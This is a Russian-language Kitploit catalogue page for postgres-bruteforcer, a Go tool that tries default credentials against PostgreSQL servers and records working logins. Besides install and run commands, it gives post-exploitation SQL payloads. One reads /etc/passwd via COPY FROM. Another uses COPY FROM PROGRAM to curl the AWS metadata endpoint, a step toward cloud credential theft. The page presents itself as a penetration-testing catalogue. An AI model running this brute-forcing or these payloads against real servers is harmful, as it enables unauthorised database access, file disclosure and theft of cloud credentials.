Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
postgres-bruteforcer — Этот инструмент берёт список учётных данных по умолчанию и проверяет его на сервере PostgreSQL, записывая все рабочие комбинации и базы данных, к которым он получает доступ. | Kitploit
Инструменты/GitHubGitHub/randomrobbiebf/postgres-bruteforcer
Атаки на ПаролиЭксплуатацияТестирование на ПроникновениеАутентификацияБезопасность Баз Данных
GitHubrandomrobbiebf/postgres-bruteforcer

postgres-bruteforcer

Этот инструмент берёт список учётных данных по умолчанию и проверяет его на сервере PostgreSQL, записывая все рабочие комбинации и базы данных, к которым он получает доступ.

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
223 лет назадЕщё не проверено

postgres-bruteforcer

Описание

Этот скрипт на Go читает список имён пользователей и паролей из файла creds.txt и проверяет их на базе данных PostgreSQL.

Скрипт принимает IP-адрес сервера PostgreSQL в качестве аргумента командной строки или текстовый файл с IP-адресами.

Если доступ предоставлен, скрипт записывает этот вывод в файл pg-output.txt.

Если пользователь postgres доступен, обычно это суперпользователь, который может позволить RCE, LFI или SSRF.

Как установить

root@kitploit:~
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest

Как запустить

root@kitploit:~
go run postgres-brute.go 1.1.1.1

postgres

Примеры эксплойтов

Получение /etc/passwd/

root@kitploit:~
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;

SSRF - получение метаданных AWS

root@kitploit:~
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;
Скачать инструмент